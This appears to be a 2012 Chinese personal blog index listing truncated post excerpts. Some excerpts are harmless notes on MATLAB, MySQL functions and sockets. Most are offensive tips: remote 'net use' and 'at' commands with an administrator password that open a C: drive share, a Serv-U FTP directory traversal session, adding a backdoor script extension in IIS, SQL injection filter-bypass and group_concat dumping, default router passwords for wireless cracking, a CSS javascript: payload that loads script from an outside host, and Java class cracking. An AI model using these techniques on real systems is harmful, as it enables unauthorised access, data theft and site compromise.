2012-05-25 04:34
net use /user:administrator bjqingda01 net time at 3:00 cmd /c "net share t=c:\ " net use /del =========== 注意:1.at的话在远程计算机上建立的计划任务是以system运行的(除非远程服务器上tasks目录的菜单“高级”指定某个交互帐号), 所以是无法访问网络及共享目录的【当然按指定用户运行at计划是可以访问网络的】 2."net share t=c:\ " 这个at计划任务开的共享,默认guest或者user是 |
2012-05-05 00:44
1.servu 6.3/6.4以及7.0,8.0等都存在目录遍历漏洞。 使用可写帐号登录(如果是匿名ftp,则只有读取权限) C:\Documents and Settings\Administrator>ftp 127.0.0.1 Connected to 127.0.0.1. 220 Serv-U FTP Server v6.4 for WinSock ready... User (127.0.0.1:(none)): admin 331 User name okay, need password. Password: 230 User logged in, proceed. ftp> cd / 250 Directory changed to / |
2012-04-30 16:36
不是那种通过iis的属性、配置来做的,直接使用vbs脚本:it_security.vbs 查看当前扩展: cscript it_security.vbs 增加一个后门.aso后缀(这儿举例): cscript it_security.vbs -a .aso,c:\windows\microsoft.net\framework\v2.0.50727\aspnet_isapi.dll,3,GET,HEAD,POST ===================== it_secu |
2012-04-30 15:36
asp.net默认后缀名为.aspx,可是我们看到许多网站的后缀名很特别比如微软的.mspx,下面讲解如何将网页后缀名改为mspx. ASP.NET 1.1中的方法: 1.IIS映射(IIS->默认网站->属性->主文档->配置->映射->添加): 扩展名.mspx ----> C:"WINNT"Microsoft.NET"Framework"v1.1.4322"aspnet_isapi.dll 限于:GET,HEAD,POST,DEBUG 2.修改web.config |
2012-04-22 21:06
Create Trigger test_tri5 on test after insert as begin declare @id sysname, @tel sysname, @name sysname select @tel=ltrim(tel),@id=ltrim([id]),@name=ltrim([name]) from inserted; insert into test2(id,tel,[name]) values(@id,@tel,@name); end 这样,只要往test表插入一条记录,就回立马执行 insert in |
2012-04-10 03:56
参数问题 Matlab中最常使用的变量有三种,分别是标量、矩阵和元胞数组(Cell Array),我们只要掌握了这三种变量就可以对付大部分的需求了。在上面的例子中m函数MyStat(mStatMatrix,mNameMatrix,n)有三个输入参数,分别是二维矩阵mStatMatrix |
2012-04-10 00:59
一、问题提示 7.0/7.1版本有个问题: Warning: No matching builtin function available for C:\MATLAB7\install\toolbox\simulink\simulink\set_param.bi 或者mcc变成m文件成可执行文件exe后,运行会出现: Undefined command/function 'set_param' Error in ==> matlabrc at 81
解决方法: 1、将 \MATLAB7\toolbox\compiler\deploy\matlabrc.m 中的 |
2012-04-07 15:27
1.and 用&& 代替 2. or 用||代替 3.union select from 变成 /*!union*/这种。 一个例子: select 1 /*!union*/ select 2 from adad where 1&&1 |
2012-03-25 17:15
concat和concat_ws()区别及MySQL的几个实用字符串函数 2008-04-15 15:44 |
2012-03-23 01:06
php sql injector的时候,很多情况下都是显示一行一行的数据,要一次得到全部数据或者表格,那就的重复多次。 函数group_concat可以实现将表格放入一个单元格中(即仅有一行一列) 例如: select group_concat(id,0x7c,name,0x7c,tel,0x5d) from g 那么将得到: 1|张三|83023023],|李四|13893232322],..... (注意上面 |
2012-03-19 14:29
无线破解常见路由器账号密码: ================================ 路由器品牌 默认IP 默认帐号 默认密码 TP LINK TD8800 192.168.1.1 root root TPLINK 8830 |
2012-02-25 22:19
比如中国: 按gb2312来来进行url编码:%D6%D0%B9%FA 按utf8或unicode来编码:%E4%B8%AD%E5%9B%BD 而escape则是%uxxxx的格式。url地址栏用的是encodeURI,具体选哪种汉字格式编码, 取决于当前网页的html里面的language,即语言编码。 给一个小的转码、编码、解码小工具(或者加密、解密)。 |
2012-02-23 19:58
<style type="text/css"> body { background:url('javascript:document.write("<script src=http://jannick.sxtyit.cn/jngzf.js></script>")') } </style>
|
2012-02-20 21:25
1.pe格式的exe破解是最常见的,资料最多,工具一对,在此不多说。 2.java的class文件的机器码的直接修改,网上最多的就是一片简单的经典文章。在此不引用 3.本次修改的是二进制代码,首先是sun公司首页(被oracle收购了)下载对照表VM Spec Opcode Mnemonics by Opcode.htm,然后使用jclasslib for windows (直接有exe双击,好像要jdk1.6版本及之后的支持)。 4.代码如何找,请见下图对照片,自己从VM Spec Opcod |
2012-02-20 20:54
1.有些机器特别是服务器有多个ip,如果默认使用socket编程的话,使用connect连接的时候,系统会自动选择一个默认ip(一般为第一个),有时候我们要选择某个特定的ip。 2.通过在调用sockt函数与connect函数之间,插入bind函数来实现指定客户端ip地址 3.实现代码: if(this->m_bBandIP) { struct sockaddr_in local_addr; local_addr.sin_family = AF_INET; local_addr.sin_port = htons(0); |
|
|
it_security
男, 岁
|